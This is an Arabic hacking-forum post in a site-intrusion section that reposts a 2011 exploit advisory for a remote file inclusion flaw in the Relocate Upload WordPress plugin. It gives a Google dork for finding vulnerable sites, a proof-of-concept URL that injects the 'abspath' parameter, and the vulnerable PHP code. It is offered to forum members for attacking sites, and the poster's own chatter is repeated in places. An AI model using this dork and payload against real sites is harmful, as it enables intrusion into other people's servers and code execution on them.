ثغره في سكربت ورد برسس ريموت فايلن انكلود
السلام عليكم ورحمة الله وبركاته
اليوم وانا جالس الف على مواقع الي مختصه بنشر الثغرات
شوفت ثغرات جديده كلها في الورد برسس لوول
ومنها هذي الثغره
طيب هذي هي الثغره مع اني ما اعرف كيف استغلها بس ولله العضيم من كثر ما انزل مواضيع عشان تساعودوني قلت لازم اثبت وجودي :tears:
بس يارب الثغره تعجبكم
تحياتي لكم :bye1:
اليوم وانا جالس الف على مواقع الي مختصه بنشر الثغرات
شوفت ثغرات جديده كلها في الورد برسس لوول
ومنها هذي الثغره
PHP:
# Exploit Title: Relocate Upload Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI
---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{ // WP setup and function access
define('WP_USE_THEMES', false);
require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameterطيب هذي هي الثغره مع اني ما اعرف كيف استغلها بس ولله العضيم من كثر ما انزل مواضيع عشان تساعودوني قلت لازم اثبت وجودي :tears:
بس يارب الثغره تعجبكم
تحياتي لكم :bye1:
اسم الموضوع : ثغره في سكربت ورد برسس ريموت فايلن انكلود
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات
